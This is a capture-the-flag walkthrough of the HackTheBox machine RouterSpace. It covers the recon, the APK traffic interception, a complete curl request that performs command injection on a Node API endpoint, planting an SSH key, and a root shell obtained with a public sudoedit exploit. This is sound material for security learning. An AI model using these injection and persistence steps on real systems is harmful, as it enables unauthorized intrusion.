RouterSpace — Hackthebox Walkthrough

This was a pretty cool box which included finding an endpoint from an APK file and then exploiting a Node application to get command execution. For the root part, we have to exploit the sudoedit vulnerability, which was a pretty hot topic at the time.

User

nmap reveals two open ports.

nmap --open -sC -sV 10.10.11.148

PORT   STATE SERVICE    REASON  VERSION
22/tcp open tcpwrapped syn-ack
| ssh-hostkey:
| 3072 f4:e4:c8:0a:a6:af:66:93:af:69:5a:a9:bc:75:f9:0c (RSA)
80/tcp open tcpwrapped syn-ack
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-title: RouterSpace
|_http-favicon: Unknown favicon MD5: 939407566E5C96D4EDF42DDDC4434FB3
|_http-trane-info: Problem with XML parsing of /evox/about

Looking at port 80, we see a static page.

It included a hyperlink to download an APK file.

http://10.10.11.148/RouterSpace.apk

I downloaded the file and did some static analysis. To be honest, this led me nowhere. So my only option was to install the APK on a device and see what it does.

I could have used Android Studio to start up an emulator to run this, but I used my old Android device. It was just easier for me. So I used adb to connect to the device. If you are not familiar with what adb is, check out this article where I talk about the basics of adb.

First, I installed the APK.

adb install RouterSpace.apk

I listed the packages to confirm it was installed fine.

adb shell pm list packages|grep router

Then I did a dumpsys of the application, which simply gives you information about the package.

adb shell dumpsys package com.routerspace

This gives us the activity name of the application, which we need in order to start it.

Then I invoked the application with the activity name I found.

adb shell am start -n com.routerspace/.MainActivity

NOTE: "All the steps after installing the APK could be done manually from the device itself, but I was more comfortable with adb."

I was prompted with "Unable to connect to the server!" when I clicked the Check Status button. Since I didn't know what the error was about, I thought of intercepting the traffic sent from the application to see what I could find.

For that, I configured a proxy with adb.

adb shell settings put global http_proxy 192.168.1.6:8080

Then I started a listener on port 8080 with nc -lvnp 8080 and then clicked the Check Status button again. I got a POST request in my listener.

It was a POST request to a new endpoint.

/api/v4/monitoring/router/dev/check/deviceAccess

I also saw that some POST data was being sent. I tried some basic injections with it and was able to get command injection with this payload.

{'ip': '`id`'}

curl -X POST -H 'Content-Type: application/json' http://10.10.11.148/api/v4/monitoring/router/dev/check/deviceAccess -d '{"ip": "`id`"}' -H 'user-agent: RouterSpaceAgent' -H 'Host: routerspace.htb'

I then added my SSH public key to the authorized_keys file and SSHed in.

echo "ssh-rsa ...<SNIP>..." >> ~/.ssh/authorized_keys

Root

Doing some basic enumeration, I found out that the version of sudo in use was 1.8.31 with:

sudo --version

I knew this version was vulnerable to the sudoedit vulnerability in sudo that had come out recently.

With a little googling I found a GitHub repo which I could use to exploit this.

I followed the steps mentioned in the repo. First, I copied the exploit.c, shellcode.c and Makefile files to the box. Then I used the make command to compile the C files.

Then I simply executed the exploit binary and I got a shell as root.

./exploit

Rooted!!

“If you have any questions, make sure to leave them down in the comments, or contact me through social media.”

Email — iamkavigihan@gmail.com
Instagram — https://www.instagram.com/_kavi.gihan/
Discord — kavigihan#8518

Happy Hacking !!! 😄

Kavishka Gihan

Cyber Security Student | Machine author in @hackthebox | find me on instagram @_kavi.gihan